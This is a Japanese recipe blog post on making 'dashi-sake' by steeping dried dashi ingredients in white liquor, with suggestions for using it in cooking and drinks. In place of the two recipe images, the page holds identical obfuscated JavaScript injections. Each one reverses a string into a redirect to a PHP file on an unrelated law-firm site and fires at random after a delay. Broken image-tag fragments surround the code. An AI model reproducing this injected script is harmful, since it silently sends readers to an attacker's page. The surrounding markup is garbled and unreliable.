ホワイトリカーで「だし(出汁)酒」のすすめ(レシピ付)

こんにちは、管理栄養士・料理家の廣野沙織(ひろのさおり)です。

以前、ホワイトリカー(焼酎)を使って作る「果実酒」についてご紹介しました。

あわせて読みたい
酒税法に注意!果実酒づくりのルールとおすすめレシピ こんにちは、管理栄養士・料理家の廣野沙織(ひろのさおり)です。 梅酒や桃酒など、果実酒(ホームメイドリキュール)を自作して楽しみたいという方は多いのではないで...

今回は、第二弾!

ホワイトリカーで、料理に便利な和風調味料が作れます!
その名も、“だし(出汁)酒” (勝手にネーミングしました笑)

乾物のだし食材を漬けるだけの簡単なものですが、だし酒の作り方や、料理への活用方法をご紹介します。

【レシピ】だし(出汁)酒

材料

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolife” title=”f:id:hironosaori:20181203110550j:plain” src=”https://hironosaori.com/wp-content/uploads/hatena/20181203110550.jpg” alt=”f:id:hironosaori:20181203110550j:plain” />

お好みのだし食材を保存容器(瓶)に入れ、

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolife” title=”f:id:hironosaori:20181203110825j:plain” src=”https://hironosaori.com/wp-content/uploads/hatena/20181203110825.jpg” alt=”f:id:hironosaori:20181203110825j:plain” />

あとは1週間程度置くだけ!冷蔵庫で保管しましょう。

普段使っている料理酒をだし酒に置き換えるだけでOK。
だしの風味・旨味が加わり、料理が一層美味しくなります。

また、煮物を作る際、臭みを消すために料理酒を使うことが多いと思いますが、このときもだし酒が活躍します。臭みを消しながらも旨味を加えられるので一石二鳥。

水にだし食材を漬けこむ「水だし」も人気ですが、これはたっぷりの「汁」を楽しむ料理に向いています。

一方、今回紹介した「だし酒」は、アルコールを飛ばしながら、旨味を濃縮させて使います。
そのため、隠し味としてスプーンひとさじ加えたり、料理酒+うま味調味料を使うような料理は、それらをだし酒で置き換えるなどの使い方がおすすめです。

ちなみに、焼酎で作っただし酒はお湯で割って飲むお酒としても美味しい。
梅干しを加えたら冬にぴったりのお湯割り焼酎に…。

アルコール度が高いため長期間日持ちするのも嬉しいポイント。だし酒はストックしておくと何かと便利です。

ぜひ、色々なだし素材でお試しください!素材1種類ずつ分けて作って、料理の際に気分で合わせても楽しいですよ♪